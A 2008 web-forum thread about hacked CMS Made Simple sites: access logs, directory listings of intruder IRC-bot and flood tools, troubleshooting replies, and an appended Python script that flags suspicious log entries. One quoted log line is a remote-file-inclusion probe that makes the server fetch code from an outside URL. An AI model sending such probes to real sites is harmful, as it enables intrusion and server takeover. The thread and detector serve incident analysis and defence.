Hi to you all,
two of my CMSms sites have been hacked; a DoS attack was started and the hoster took the complete server off the net.
There is a new folder under the TMP folder. It has different names (sl or fload).
I will post more info when the server is online again and my provider has sent me detailed information.
Because my English is very bad, I will write all other information in German; you can find it here http://forum.cmsmadesimple.org/index.php/topic,22787.0.html.
Regards
Th. Holler
CMSms-Site hack, complete Server down
Re: CMSms-Site hack, complete Server down
we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
vulnerable script on the server.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMSms-Site hack, complete Server down
Hi
calguy1000 wrote: we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
vulnerable script on the server.
here are the answers:
a: 1.3, updated 2 or 3 days ago
b: I normally update asap; within 2 or 3 days after a new release is online
c: here are the logs
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:44 +0200] "POST /s.php HTTP/1.1" 200 6777 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
08/access_log:72.46.131.186 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
My provider found a file called s.php on the root of the domain and suspicious directories under TMP:
1. Domain, everything in folder FL:
03.09.2006 02:02 20.358 configure
11.06.2008 12:43 contrib
11.06.2008 00:00 64 cyc.acc
11.06.2008 11:00 1.047 cyc.levels
10.06.2008 22:00 6 cyc.pid
11.06.2008 11:00 298 cyc.session
19.05.2008 10:12 1.310 cyc.set
03.09.2006 02:03 4.144 genuser
14.07.2005 14:51 590.481 httpd
10.07.2005 15:31 2.156 Makefile
11.06.2008 12:43 randfiles
05.07.2005 13:38 13.399 stealth
01.06.2006 14:40 21.534 xhide
11 Datei(en), 654.797 Bytes
Verzeichnis von \contrib
11.06.2008 12:43 .
11.06.2008 12:43 ..
11.06.2008 12:43 config
23.06.2001 18:36 1.251 cvsupdate
11.06.2008 12:43 patches
1 Datei(en), 1.251 Bytes
Verzeichnis von \config
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.843 config
07.04.2001 04:38 1.131 Input.pl
11.06.2008 12:43 servers
2 Datei(en), 6.974 Bytes
Verzeichnis von \servers
11.06.2008 12:43 .
11.06.2008 12:43 ..
02.05.2001 09:40 289 DALNET
02.05.2001 09:40 543 EFNET
23.06.2001 04:18 735 UNDERNET
3 Datei(en), 1.567 Bytes
Verzeichnis von \patches
11.06.2008 12:43 .
11.06.2008 12:43 ..
20.06.2001 03:32 6.901 emech-2.8.2-sha.diff
1 Datei(en), 6.901 Bytes
Verzeichnis von \randfiles
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.195 randaway.e
07.04.2001 04:38 3.982 randinsult.e
07.04.2001 04:38 830 randkicks.e
07.04.2001 04:38 519 randnicks.e
07.04.2001 04:38 2.495 randpickup.e
07.04.2001 04:38 55.316 randsay.e
07.04.2001 04:38 3.651 randsignoff.e
07.04.2001 04:38 1.465 randversions.e
2. Domain, everything in Dir FLOOD:
08.09.2002 04:51 15.988 juno
09.02.2001 04:30 8.268 slice2
01.10.2001 20:59 8.268 slice3
06.08.2000 14:56 13.399 stealth
07.02.1996 03:38 17.690 synk
07.03.2002 05:29 14.911 vadimII
By now I have added the security things from the security thread. Hope that's enough.
Regards
Thorsten
Re: CMSms-Site hack, complete Server down
Hello,
it would be nice to know the http logs just before s.php was put in your web space "to find out if they came in through CMS or through some other vulnerable script on the server" (I quote Calguy1000 because my English isn't native either). Can you or your hosting provider give information about this?
Don't bother with intruder directories: nuke them.
And thanks for your feedback: it strengthens the double slash // URL filtering rule.
Pierre M.
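Since both calguy1000's question c) and Pierre's double-slash rule come down to reading the httpd access log for the request that dropped s.php, here is an added example (not from the thread or the CMSms project) that parses the quoted log lines and raises the indicators visible in them: the `//` path prefix, a remote URL passed as a query parameter, a request to a PHP script outside an allowlist, and a scripted user agent. The allowlist `KNOWN_PHP` and the benign 192.0.2.1 request are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl
# Apache "combined" log format; the optional "NN/access_log:" prefix is what grep
# prepends when searching several daily logs at once, as in the lines quoted above.
LOG_RE = re.compile(
    r'^(?:[^\s:]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumed allowlist of PHP entry points legitimately requested on this site (adjust
# to the installation); any other .php path, such as a dropped s.php, gets flagged.
KNOWN_PHP = {"/index.php"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_line(line):
    """Parse one access-log line into its fields; None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def flags_for(entry):
    """Indicators worth a second look for one parsed request."""
    path, _, query = entry["target"].partition("?")
    flags = []
    if path.startswith("//"):
        flags.append("double-slash path")  # what the // URL filtering rule catches
    if any(REMOTE_URL.match(v) for _, v in parse_qsl(query, keep_blank_values=True)):
        flags.append("remote URL in query parameter")  # remote-file-inclusion probe
    if path.lower().endswith(".php") and path not in KNOWN_PHP:
        flags.append("PHP script outside allowlist")
    if entry["ua"].startswith("libwww-perl"):
        flags.append("scripted client user agent")
    return flags

def analyse(lines):
    """(ip, method, target, flags) for every line that raised at least one flag."""
    parsed = filter(None, (parse_line(line) for line in lines))
    return [(e["ip"], e["method"], e["target"], f) for e in parsed if (f := flags_for(e))]

# Sample input: three lines quoted in this thread plus one constructed benign request
# from 192.0.2.1, showing that ordinary traffic is not flagged.
SAMPLE_LOG = [
    '10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '08/access_log:72.46.131.186 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"',
    '192.0.2.1 - - [08/Jun/2008:14:10:00 +0200] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, target, flags in analyse(SAMPLE_LOG):
        print(ip, method, target, "->", ", ".join(flags))
```

The two-day gap between the flagged 08/Jun request and the first s.php hit on 10/Jun is the window the hoster's logs would need to cover to answer Pierre's question.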